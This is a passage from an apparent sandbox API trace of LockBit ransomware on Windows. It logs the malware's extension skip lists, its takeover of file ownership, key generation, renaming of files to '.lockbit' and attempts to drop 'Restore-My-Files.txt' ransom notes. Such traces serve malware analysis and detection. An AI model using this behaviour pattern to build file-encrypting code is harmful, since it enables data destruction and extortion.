returned 1 [0084.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0084.226] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0084.227] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0084.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.247] malloc (_Size=0xb4) returned 0x77d800 [0084.247] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0084.247] free (_Block=0x77d800) [0084.247] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.247] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.248] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.248] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724c6b5d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724c6b5d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1681, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_frame-highlight.png", cAlternateFileName="")) returned 1 [0084.248] lstrcmpiW (lpString1=".", lpString2="Pets_frame-highlight.png") returned -1 [0084.248] lstrcmpiW (lpString1="..", lpString2="Pets_frame-highlight.png") returned -1 [0084.248] PathFindExtensionW (pszPath="Pets_frame-highlight.png") returned=".png" [0084.248] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.248] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.248] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.249] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.249] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.249] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.249] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.249] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.250] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.250] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_frame-highlight.png") returned 1 [0084.251] lstrcmpiW (lpString1="ntldr", lpString2="Pets_frame-highlight.png") returned -1 [0084.251] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_frame-highlight.png") returned -1 [0084.251] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_frame-highlight.png") returned -1 [0084.251] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_frame-highlight.png") returned -1 [0084.251] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_frame-highlight.png") returned 1 [0084.251] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_frame-highlight.png") returned -1 [0084.251] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.251] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png") returned=".png" [0084.251] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.251] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.251] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.251] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.251] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.251] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.251] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.251] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.252] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.252] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.252] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.252] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.252] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.252] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.253] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.253] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.253] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png.lockbit") returned 82 [0084.253] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.253] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.254] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.254] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.254] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.254] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.254] RtlFreeAnsiString (AnsiString="\\") [0084.254] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.254] malloc (_Size=0x200) returned 0x77d800 [0084.255] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.255] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.255] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.255] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.255] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.256] CloseHandle (hObject=0x3b4) returned 1 [0084.256] free (_Block=0x77d800) [0084.256] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.256] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.256] malloc (_Size=0x40068) returned 0x2031ed0 [0084.257] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5761) returned 1 [0084.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0084.258] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0084.259] ReadFile (in: hFile=0x3b4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0084.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.720] malloc (_Size=0xba) returned 0x77d800 [0084.720] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0x0 [0084.724] free (_Block=0x77d800) [0084.724] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.725] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.725] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.725] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722fdb01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722fdb01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6dc875, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_frame-imageMask.png", cAlternateFileName="")) returned 1 [0084.725] lstrcmpiW (lpString1=".", lpString2="Pets_frame-imageMask.png") returned -1 [0084.725] lstrcmpiW (lpString1="..", lpString2="Pets_frame-imageMask.png") returned -1 [0084.725] PathFindExtensionW (pszPath="Pets_frame-imageMask.png") returned=".png" [0084.725] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.725] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.725] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.726] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.726] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_frame-imageMask.png") returned 1 [0084.726] lstrcmpiW (lpString1="ntldr", lpString2="Pets_frame-imageMask.png") returned -1 [0084.726] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_frame-imageMask.png") returned -1 [0084.727] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_frame-imageMask.png") returned -1 [0084.727] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_frame-imageMask.png") returned -1 [0084.727] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_frame-imageMask.png") returned 1 [0084.727] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_frame-imageMask.png") returned -1 [0084.727] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.727] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png") returned=".png" [0084.727] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.727] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.727] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.727] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.728] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.728] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png.lockbit") returned 82 [0084.728] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.729] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.729] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.729] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.730] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.730] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.730] RtlFreeAnsiString (AnsiString="\\") [0084.730] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0084.730] malloc (_Size=0x200) returned 0x77d800 [0084.731] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.731] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.731] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.731] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.731] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.731] CloseHandle (hObject=0x3b4) returned 1 [0084.732] free (_Block=0x77d800) [0084.732] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0084.732] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.732] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.732] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=8169) returned 1 [0084.732] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.733] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.733] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.734] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.734] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0084.744] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.744] malloc (_Size=0xba) returned 0x1ff1e60 [0084.744] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0084.744] free (_Block=0x1ff1e60) [0084.744] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-imageMask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.744] wsprintfW (in: 